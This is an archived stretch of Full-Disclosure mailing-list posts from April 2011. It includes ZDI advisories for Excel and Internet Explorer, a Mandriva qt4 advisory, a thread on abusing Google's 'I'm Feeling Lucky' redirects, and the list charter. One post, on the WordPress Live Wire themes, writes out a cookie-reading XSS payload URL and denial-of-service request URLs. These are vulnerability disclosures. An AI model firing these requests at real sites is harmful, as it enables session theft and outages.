required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The flaw exists within the methods used for RealTimeData Record Parsing.
When handling a stTopic field has a bit set specifying double byte
characters in the following field the value of a global pointer is
improperly calculated. This pointer is later used in a memcpy operation
whose source is user supplied data. A remote attacker can exploit this
vulnerability to execute arbitrary code under the context of the user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx

-- Disclosure Timeline:
2010-11-15 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aniway (Aniway.Anyway AT gmail DOT com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-119: (Pwn2Own) Microsoft Internet Explorer onPropertyChange Remote Code Execution Vulnerability

[ZDI Disclosures]

ZDI-11-119: (Pwn2Own) Microsoft Internet Explorer onPropertyChange Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-119

April 12, 2011

-- CVE ID:
CVE-2011-1345 

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11040. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Internet Explorer. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles
onPropertyChange function calls. When the onPropertyChange event handler
is set to an object's attribute collection, it fails to keep an accurate
reference counter to the event object. The effect of this can be that
the program frees the event object while there are still references to
it. This can result in remote code execution under the content of the
current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-018.mspx

-- Disclosure Timeline:
2011-03-09 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vulnerabilities in Live Wire 2.0 and Live Wire Style themes for WordPress

[MustLive]

Hello list!

I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse
of Functionality and Denial of Service vulnerabilities in Live Wire 2.0 and
Live Wire Style themes for WordPress. These are another two themes which
are a part of Live Wire series together with Live Wire Edition. These are
commercial themes for WP by WooThemes.

-
Affected products:
-

Vulnerable are Live Wire 2.0 and Live Wire Style version 2.3.1 and previous
versions. XSS is possible only in old versions of the themes. Recently in
version 2.4 most of these vulnerabilities were fixed (but there were still
left many not fixed FPD).

--
Details:
--

XSS (WASC-08):

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/livewire/thumb.php?src=jpg

http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=111

http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=111&w=1

http://site/wp-content/themes/livewire/

And also other 30 php-scripts of the theme in folder /livewire/ and all
subfolders.

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS (WASC-10):

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

About such AoF and DoS vulnerabilities I wrote in article Using of the sites
for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Beside folder /livewire/, these themes also can be placed in folders
/livewire-dev/ and /livewire-package/ (which includes all three themes of
Live Wire series).


Timeline:


2011.02.01 - informed developers about other themes.
2011.02.05 - announced at my site.
2011.02.07 - additionally informed developers about these themes.
2011.02.04-12 - conversation about fixing holes in all their themes for
WordPress. At first they tried to fix all these holes in themes at their own
sites.
2011.03.28 - developers released version 2.4.
2011.04.12 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4907/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [ MDVSA-2011:074 ] qt4

[Zach C.]

That's your cue, guys who reported every single program using the same DLL
vulnerable to DLL hijacking! Find those bad certs and start reporting every
single application using Qt! THE WORLD IS COUNTING ON YOU TO INFORM US OF
THESE THREATS TO OUR SECURITY.

On Apr 12, 2011 10:19 AM,  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ___
>
> Mandriva Linux Security Advisory MDVSA-2011:074
> http://www.mandriva.com/security/
> ___
>
> Package : qt4
> Date : April 12, 2011
> Affected: 2009.0, 2010.0, 2010.1
> ___
>
> Problem Description:
>
> It was discovered that the QT packages were affected by the fraudalent
> certificates problem as well, the same issue as with firefox
> (MDVSA-2011:068).
>
> Packages for 2009.0 are provided as of the Extended Maintenance
> Program. Please visit this link to learn more:
> http://store.mandriva.com/product_info.php?cPath=149&products_id=490
>
> The updates packages has been patched to solve this issue.
> ___
>
> References:
>
> http://www.mandriva.com/security/advisories?name=MDVSA-2011:068
> http://bugreports.qt.nokia.com/browse/QTBUG-18338
> ___
>
> Updated Packages:
>
> Mandriva Linux 2009.0:
> d3405100e866576e8bac7f69b853067d
2009.0/i586/libqassistant4-4.5.2-1.7mdv2009.0.i586.rpm
> c4f56332b868a3691cde2a5c0448aef7
2009.0/i586/libqt3support4-4.5.2-1.7mdv2009.0.i586.rpm
> b64ab10ea49540af8459ab4000c7767b
2009.0/i586/libqt4-devel-4.5.2-1.7mdv2009.0.i586.rpm
> 278bb8ccef79394b76e888d7fd98f23d
2009.0/i586/libqtclucene4-4.5.2-1.7mdv2009.0.i586.rpm
> 7610dd11459c2fe502abbb972a00ac44
2009.0/i586/libqtcore4-4.5.2-1.7mdv2009.0.i586.rpm
> 664d25b0f1af2ad0d0f77511ec4d895b
2009.0/i586/libqtdbus4-4.5.2-1.7mdv2009.0.i586.rpm
> 40a9ec8c4df313b4a39091611f96
2009.0/i586/libqtdesigner4-4.5.2-1.7mdv2009.0.i586.rpm
> 7fe0928e378629086beb6c2623e713cc
2009.0/i586/libqtgui4-4.5.2-1.7mdv2009.0.i586.rpm
> 6f5885626d703d80690d629b882b78b9
2009.0/i586/libqthelp4-4.5.2-1.7mdv2009.0.i586.rpm
> 3121fb0365a15285b2af0030e636ca85
2009.0/i586/libqtnetwork4-4.5.2-1.7mdv2009.0.i586.rpm
> e215b687c05f2b6b8724b3bab62647a0
2009.0/i586/libqtopengl4-4.5.2-1.7mdv2009.0.i586.rpm
> 2a4f7ed94a4124b8e492beae6cb4e41c
2009.0/i586/libqtscript4-4.5.2-1.7mdv2009.0.i586.rpm
> 34f3a481dc7491a14da1f819518518cf
2009.0/i586/libqtscripttools4-4.5.2-1.7mdv2009.0.i586.rpm
> 26700ef0087c7a673739221dbde454a6
2009.0/i586/libqtsql4-4.5.2-1.7mdv2009.0.i586.rpm
> 3a159ca06df2944229f14fedf6e5d0d3
2009.0/i586/libqtsvg4-4.5.2-1.7mdv2009.0.i586.rpm
> a8b4d8d02503127c20137e5cd1feeb2f
2009.0/i586/libqttest4-4.5.2-1.7mdv2009.0.i586.rpm
> 40377a353b4a722125a8cc3227da999b
2009.0/i586/libqtwebkit4-4.5.2-1.7mdv2009.0.i586.rpm
> 094aa1b4fecc14f526321a2cba1ba6be
2009.0/i586/libqtxml4-4.5.2-1.7mdv2009.0.i586.rpm
> 5a47b688005c38217d2ebd2aaacaab22
2009.0/i586/libqtxmlpatterns4-4.5.2-1.7mdv2009.0.i586.rpm
> 6108509ae6fd3c630344dbd22ae73069
2009.0/i586/qt4-accessibility-plugin-4.5.2-1.7mdv2009.0.i586.rpm
> 94123cd2a7b847b2942f59dcf4f93f94
2009.0/i586/qt4-assistant-4.5.2-1.7mdv2009.0.i586.rpm
> cebb3584f250b31ceae49b1bdfbc271a
2009.0/i586/qt4-common-4.5.2-1.7mdv2009.0.i586.rpm
> 93446ee40dca08fcf3672fcba2f9e4ab
2009.0/i586/qt4-database-plugin-mysql-4.5.2-1.7mdv2009.0.i586.rpm
> 60e58167df55713d856890ebb83f5d7a
2009.0/i586/qt4-database-plugin-odbc-4.5.2-1.7mdv2009.0.i586.rpm
> dade28e78b5f464bd0dfad103e7c42c3
2009.0/i586/qt4-database-plugin-pgsql-4.5.2-1.7mdv2009.0.i586.rpm
> d36ef5589cc939b57af7a31c600dd83a
2009.0/i586/qt4-database-plugin-sqlite-4.5.2-1.7mdv2009.0.i586.rpm
> fcc6ada23f0c2240aec2847220ebeeb9
2009.0/i586/qt4-database-plugin-tds-4.5.2-1.7mdv2009.0.i586.rpm
> 9aa0dfe289e72d711826c95988f2b1c4
2009.0/i586/qt4-designer-4.5.2-1.7mdv2009.0.i586.rpm
> 03d6d09a7d1ff9806f76259a44374f69
2009.0/i586/qt4-doc-4.5.2-1.7mdv2009.0.i586.rpm
> a7905f55658bb95983e804b2f410d239
2009.0/i586/qt4-examples-4.5.2-1.7mdv2009.0.i586.rpm
> 03db0fc6e0a7da2a5b41e234e820cfdb
2009.0/i586/qt4-graphicssystems-plugin-4.5.2-1.7mdv2009.0.i586.rpm
> 96137650ff0e8d3044b8d0a9812f168d
2009.0/i586/qt4-linguist-4.5.2-1.7mdv2009.0.i586.rpm
> b6dc9f1a15a6075bf0961adbfe93263c
2009.0/i586/qt4-qdoc3-4.5.2-1.7mdv2009.0.i586.rpm
> 1a9108aeeae481a176403db5cdce35f4
2009.0/i586/qt4-qtconfig-4.5.2-1.7mdv2009.0.i586.rpm
> 10b5df5dcd6ca2afbb60d056ccdfe6d8
2009.0/i586/qt4-qtdbus-4.5.2-1.7mdv2009.0.i586.rpm
> ebc0b9e53f1f1495d2cffb61938dbcf1
2009.0/i586/qt4-qvfb-4.5.2-1.7mdv2009.0.i586.rpm
> de31a6925a9965f363fc1e8e98227c90
2009.0/i586/qt4-xmlpatterns-4.5.2-1.7mdv2009.0.i586.rpm
> e92dde56825fb3456c7c82b7550c6dd8
2009.0/SRPMS/qt4-4.5.2-1.7mdv2009.0.src.rpm
>
> Mandriva Linux 2009.0/X86_64:
> a0becbaa0c06309d92472b581f9dca42
2009.0/x86_64/lib64qass

[Full-disclosure] [ MDVSA-2011:074 ] qt4

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:074
 http://www.mandriva.com/security/
 ___

 Package : qt4
 Date: April 12, 2011
 Affected: 2009.0, 2010.0, 2010.1
 ___

 Problem Description:

 It was discovered that the QT packages were affected by the fraudalent
 certificates problem as well, the same issue as with firefox
 (MDVSA-2011:068).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updates packages has been patched to solve this issue.
 ___

 References:

 http://www.mandriva.com/security/advisories?name=MDVSA-2011:068
 http://bugreports.qt.nokia.com/browse/QTBUG-18338
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 d3405100e866576e8bac7f69b853067d  
2009.0/i586/libqassistant4-4.5.2-1.7mdv2009.0.i586.rpm
 c4f56332b868a3691cde2a5c0448aef7  
2009.0/i586/libqt3support4-4.5.2-1.7mdv2009.0.i586.rpm
 b64ab10ea49540af8459ab4000c7767b  
2009.0/i586/libqt4-devel-4.5.2-1.7mdv2009.0.i586.rpm
 278bb8ccef79394b76e888d7fd98f23d  
2009.0/i586/libqtclucene4-4.5.2-1.7mdv2009.0.i586.rpm
 7610dd11459c2fe502abbb972a00ac44  
2009.0/i586/libqtcore4-4.5.2-1.7mdv2009.0.i586.rpm
 664d25b0f1af2ad0d0f77511ec4d895b  
2009.0/i586/libqtdbus4-4.5.2-1.7mdv2009.0.i586.rpm
 40a9ec8c4df313b4a39091611f96  
2009.0/i586/libqtdesigner4-4.5.2-1.7mdv2009.0.i586.rpm
 7fe0928e378629086beb6c2623e713cc  
2009.0/i586/libqtgui4-4.5.2-1.7mdv2009.0.i586.rpm
 6f5885626d703d80690d629b882b78b9  
2009.0/i586/libqthelp4-4.5.2-1.7mdv2009.0.i586.rpm
 3121fb0365a15285b2af0030e636ca85  
2009.0/i586/libqtnetwork4-4.5.2-1.7mdv2009.0.i586.rpm
 e215b687c05f2b6b8724b3bab62647a0  
2009.0/i586/libqtopengl4-4.5.2-1.7mdv2009.0.i586.rpm
 2a4f7ed94a4124b8e492beae6cb4e41c  
2009.0/i586/libqtscript4-4.5.2-1.7mdv2009.0.i586.rpm
 34f3a481dc7491a14da1f819518518cf  
2009.0/i586/libqtscripttools4-4.5.2-1.7mdv2009.0.i586.rpm
 26700ef0087c7a673739221dbde454a6  
2009.0/i586/libqtsql4-4.5.2-1.7mdv2009.0.i586.rpm
 3a159ca06df2944229f14fedf6e5d0d3  
2009.0/i586/libqtsvg4-4.5.2-1.7mdv2009.0.i586.rpm
 a8b4d8d02503127c20137e5cd1feeb2f  
2009.0/i586/libqttest4-4.5.2-1.7mdv2009.0.i586.rpm
 40377a353b4a722125a8cc3227da999b  
2009.0/i586/libqtwebkit4-4.5.2-1.7mdv2009.0.i586.rpm
 094aa1b4fecc14f526321a2cba1ba6be  
2009.0/i586/libqtxml4-4.5.2-1.7mdv2009.0.i586.rpm
 5a47b688005c38217d2ebd2aaacaab22  
2009.0/i586/libqtxmlpatterns4-4.5.2-1.7mdv2009.0.i586.rpm
 6108509ae6fd3c630344dbd22ae73069  
2009.0/i586/qt4-accessibility-plugin-4.5.2-1.7mdv2009.0.i586.rpm
 94123cd2a7b847b2942f59dcf4f93f94  
2009.0/i586/qt4-assistant-4.5.2-1.7mdv2009.0.i586.rpm
 cebb3584f250b31ceae49b1bdfbc271a  
2009.0/i586/qt4-common-4.5.2-1.7mdv2009.0.i586.rpm
 93446ee40dca08fcf3672fcba2f9e4ab  
2009.0/i586/qt4-database-plugin-mysql-4.5.2-1.7mdv2009.0.i586.rpm
 60e58167df55713d856890ebb83f5d7a  
2009.0/i586/qt4-database-plugin-odbc-4.5.2-1.7mdv2009.0.i586.rpm
 dade28e78b5f464bd0dfad103e7c42c3  
2009.0/i586/qt4-database-plugin-pgsql-4.5.2-1.7mdv2009.0.i586.rpm
 d36ef5589cc939b57af7a31c600dd83a  
2009.0/i586/qt4-database-plugin-sqlite-4.5.2-1.7mdv2009.0.i586.rpm
 fcc6ada23f0c2240aec2847220ebeeb9  
2009.0/i586/qt4-database-plugin-tds-4.5.2-1.7mdv2009.0.i586.rpm
 9aa0dfe289e72d711826c95988f2b1c4  
2009.0/i586/qt4-designer-4.5.2-1.7mdv2009.0.i586.rpm
 03d6d09a7d1ff9806f76259a44374f69  
2009.0/i586/qt4-doc-4.5.2-1.7mdv2009.0.i586.rpm
 a7905f55658bb95983e804b2f410d239  
2009.0/i586/qt4-examples-4.5.2-1.7mdv2009.0.i586.rpm
 03db0fc6e0a7da2a5b41e234e820cfdb  
2009.0/i586/qt4-graphicssystems-plugin-4.5.2-1.7mdv2009.0.i586.rpm
 96137650ff0e8d3044b8d0a9812f168d  
2009.0/i586/qt4-linguist-4.5.2-1.7mdv2009.0.i586.rpm
 b6dc9f1a15a6075bf0961adbfe93263c  
2009.0/i586/qt4-qdoc3-4.5.2-1.7mdv2009.0.i586.rpm
 1a9108aeeae481a176403db5cdce35f4  
2009.0/i586/qt4-qtconfig-4.5.2-1.7mdv2009.0.i586.rpm
 10b5df5dcd6ca2afbb60d056ccdfe6d8  
2009.0/i586/qt4-qtdbus-4.5.2-1.7mdv2009.0.i586.rpm
 ebc0b9e53f1f1495d2cffb61938dbcf1  
2009.0/i586/qt4-qvfb-4.5.2-1.7mdv2009.0.i586.rpm
 de31a6925a9965f363fc1e8e98227c90  
2009.0/i586/qt4-xmlpatterns-4.5.2-1.7mdv2009.0.i586.rpm 
 e92dde56825fb3456c7c82b7550c6dd8  2009.0/SRPMS/qt4-4.5.2-1.7mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 a0becbaa0c06309d92472b581f9dca42  
2009.0/x86_64/lib64qassistant4-4.5.2-1.7mdv2009.0.x86_64.rpm
 7e6b0967826c57d7178519f07510f0c0  
2009.0/x86_64/lib64qt3support4-4.5.2-1.7mdv2009.0.x86_64.rpm
 97704cc84610709eb09858b6c2957351  
2009.0/x86_64/lib64qt4-devel-4.5.2-1.7mdv2009.0.x86_64.rpm
 e95c14d28f8efbd7bdd343651780240c

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

[Tim]

> 2)Only announcements for OSI approved projects.  Webappsec has this
> policy I think, and it rewards people who share the most openly.

I would argue that something like this is the best for full
disclosure.  Afterall, if you release a tool, your techniques are not
really fully disclosed if you keep the source code closed.  

Note that open source != free (example: commercial PGP), but I would
think the source code should be made publicly accessible, even if the
licensing is more restrictive.

However, in the case of "INSECT Pro", the frequency of posts is far
too high, regardless of other considerations.

tim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [IMF 2011] Call for Participation

[Oliver Goebel]

Dear all,

please find enclosed the call for participation for IMF 2011.

See the program at:
http://www.imf-conference.org/imf2011/program.html

The conference will take place from Tuesday, May 10th through Thursday,
May 12th in Stuttgart, Germany.

Registration Details can be found at:
http://www.imf-conference.org/imf2011/registration.html

Early registration discounts will be available until April 25th, 2011.

Please excuse possible cross postings.




CALL FOR PARTICIPATION

   IMF 2011

  6th International Conference
   on IT Security Incident Management & IT Forensics

May 10th - 12th, 2011
  Stuttgart, Germany

 Early Registration Closes on April 25th!



IT-Security has become a steady concern for all entities operating
IT-Systems. These include enterprises, governmental and non-governmental
organizations, as well as individuals.  Yet, despite high-end
precautionary measures taken, not every attack or security mishap can be
prevented and hence incidents will go on happening.  In such cases
forensic capabilities in investigating incidents in both technical and
legal aspects are vital to understand their issue and feed back the
knowledge gained into the security process.  Documenting the measures
taken to prevent or minimize damage to own or external IT infrastructure
provides legal rear cover if an involved party decides to start
proceedings. In a possible lawsuit emerging from such an incident, its
treatment in a forensically proper way is crucial to be able to possibly
claim for damages or prevent from being threatened by claims of third
parties.  Thus, capable incident response and forensic procedures have
become an essential part of IT infrastructure operations.

In law enforcement IT forensics is an important branch and its
significance constantly increases since IT has become an essential part
in almost every aspect of daily life.  IT systems produce traces and
evidence in many ways that play a more and more relevant role in
resolving cases.

IMF's intent is to gather experts from throughout the world in order to
present and discuss recent technical and methodical advances in the
fields of IT security incident response and management and IT forensics.
The conference provides a platform for collaboration and exchange of
ideas between industry (both as users and solution providers), academia,
law-enforcement and other government bodies.

CONFERENCE PROGRAM
==
Please find the conference program at:

   http://www.imf-conference.org/imf2011/program.html


REGISTRATION

Please find an overview of the conference fees as well as the
registration form at:

   http://www.imf-conference.org/imf2011/registration.html

Early registration discounts will be available until

  April 25th, 2011


PROGRAM COMMITTEE
=
Rafael Accorsi  Universitaet Freiburg, Germany
Susan Brenner   University of Dayton, USA
Jack Cole   US Army Research Laboratory, USA
Andrew Cormack  JANET, UK
Andreas Dondera Landeskriminalamt Hamburg, Germany
Ralf DoerrieGermany
Ralf Ehlert Universitaet Magdeburg, Germany
Felix Freiling  Universitaet Mannheim, Germany
Sandra Frings   Fraunhofer IAO, Germany
Oliver Goebel   Universitaet Stuttgart, Germany
Detlef Guenther Volkswagen AG, Germany
Vijay K. GurbaniBell Labs, USA
Alexander Herrigel  Abraxas Informatik AG, Switzerland
Stefan KiltzUniversitaet Magdeburg, Germany
Bernhard M. Haemmerli   ACRIS GmbH, Switzerland
Jim LyleNIST, USA
Robert Martin   MITRE Corp., USA
Holger Morgenstern  gutachten.info, Germany
Jens Nedon  Germany
Dirk Schadt SPOT, Germany
Mark Schiller   Statton Security Ltd, UK
Andreas SchusterDeutsche Telekom, Germany
Marco Thorbruegge   ENISA, EU
Stephen D. WolthusenRoyal Holloway, Univ. of London, UK
Steven W. Wood  Alste Technologies GmbH, Germany


CONFERENCE CHAIR

Detlef Guenther
Corporate Internal Audit, Volkswagen AG
chair-2011 @ imf-conference.org


PROGRAM CHAIR
=
Holger Morgenstern
IT-Expert Witness, gutachten.info
pc-chair-2011 @ imf-conference.org


ORGANIZING COMMITTEE

Jack Cole
Ralf Ehlert
Sandra Frings
Oliver Goebel
Detlef Guenther
Stefan Kiltz
Holger Morgenstern
Jens Nedon
Dirk Schadt


STEERING COMMITTEE
==
Sandra Frings
Oliver Goebel
Detlef Guenther
Jens Nedon
Dirk Schadt


UNDER THE AUSPICES OF
=
German Informatics Society (GI e.V.)
Wissenschaftszentrum Ahrstr. 45, 53175 Bonn, Germany
Tel.: +49 228 302 145, Fax: +49

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[Valdis . Kletnieks]

On Mon, 11 Apr 2011 23:05:37 EDT, Leon Kaiser said:

> I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a
> practical use for it?

For rickrolls, or course.


pgpchpfWmHgdw.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[satyam pujari]

@Cal Try this...

http://www.google.com/search?q=esploit&btnI

http://www.google.com/search?q=esploit+zeus&btnI

http://www.google.com/search?q=0x+t35&btnI&safe=active

some of them didn't work aswell..

http://www.google.com/search?q=0x+t35&btnI

http://www.google.com/search?q=hello+hacker&btnI

but funny "hello human" works..

http://www.google.com/search?q=hello+human&btnI

I bet there's some keyword filter/check at Google's side (but I
believe which can be bypassed)
So, it's all about playing with the keywords.


On Tue, Apr 12, 2011 at 2:39 PM, Cal Leeming  wrote:
>
> Didn't seem to wrok for me:
> http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage
>   +refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b
>
> On Tue, Apr 12, 2011 at 4:05 AM, Leon Kaiser  wrote:
>>
>> I don't see why people are able to directly link to "I'm Feeling Lucky" 
>> Google search results in the first place. Can anyone think of a practical 
>> use for it?
>>
>> 
>> Leon Kaiser  - Head of GNAA Public Relations -
>>     litera...@gnaa.eu || litera...@goatse.fr
>>    http://gnaa.eu || http://security.goatse.fr
>>   7BEECD8D FCBED526 F7960173 459111CE F01F9923
>> "The mask of anonymity is not intensely constructive."
>>    -- Andrew "weev" Auernheimer
>> 
>>
>> On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:
>>
>> Thanks for that Nick , good to know , but unfortunately it's still 
>> exploitable in 2011 :)
>>
>> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald  
>> wrote:
>>
>> satyam pujari wrote:
>>
>> > Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
>> > scenario.
>>
>> > [...]
>>
>> Yawn...
>>
>> That's _so_ 2007!
>>
>>   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
>>
>> ...and I seriously doubt that was the first time it was done, just when
>> _I_ happened to make a note of it being actively abused in spam.
>>
>> All that other stuff about free hosting sites and IFrames on
>> blogger.com is unnecessary implementation detail that can be achieved
>> multitudinous ways.
>>
>>
>>
>> Regards,
>>
>> Nick FitzGerald
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

[satyam pujari]

The question is, do we really need this feature ? How many people really use
"I'm feeling Lucky".
Can't Google implement something more 'useful' on the search home
page..thoughts ?

On Tue, Apr 12, 2011 at 5:52 PM, Nick FitzGerald
wrote:

> Leon Kaiser wrote:
>
> > I don't see why people are able to directly link to "I'm Feeling Lucky"
> > Google search results in the first place. Can anyone think of a
> > practical use for it?
>
> Putting a Referer check on "I'm Feeling Lucky" was suggested back
> in/around September 2007, but as it still works from anywhere, you can
> see how much Google-oids really take the company's "do not facilitate
> the less than desirable" to heart...
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] List Charter

[John Cartwright]

[Full-Disclosure] Mailing List Charter
John Cartwright 
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

